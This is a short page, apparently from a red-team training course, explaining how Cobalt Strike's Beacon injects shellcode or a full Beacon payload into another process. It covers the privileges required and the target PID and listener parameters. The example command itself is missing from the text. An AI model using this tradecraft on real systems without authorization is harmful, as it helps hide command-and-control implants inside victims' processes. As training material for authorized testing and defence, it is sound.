Last updated
Last updated
Process injection allows us to inject arbitrary shellcode into a process of our choosing. You can only inject into processes that you can obtain a handle to with enough privileges to write into its memory. In a non-elevated context, which usually limits you to your own processes. In an elevated context, this includes processes owned by other users.
Beacon has two main injection commands - shinject
and inject
. shinject
allows you to inject any arbitrary shellcode from a binary file on your attacking machine; and inject
will inject a full Beacon payload for the specified listener.
If we wanted to inject a TCP Beacon payload into the MMC process mentioned in the previous module, we could do:
Where:
4464 is the target PID.
x64 is the architecture of the process.
tcp-local is the listener name.
The command will also automatically attempt to connect to the child if a P2P listener is used. The resulting Beacon will run with the full privilege of the user who owns the process.
The same caveats also apply - if the user closes this process, the Beacon will be lost. The shellcode that's injected uses the Exit Thread function, so it won't kill the process if we exit the Beacon.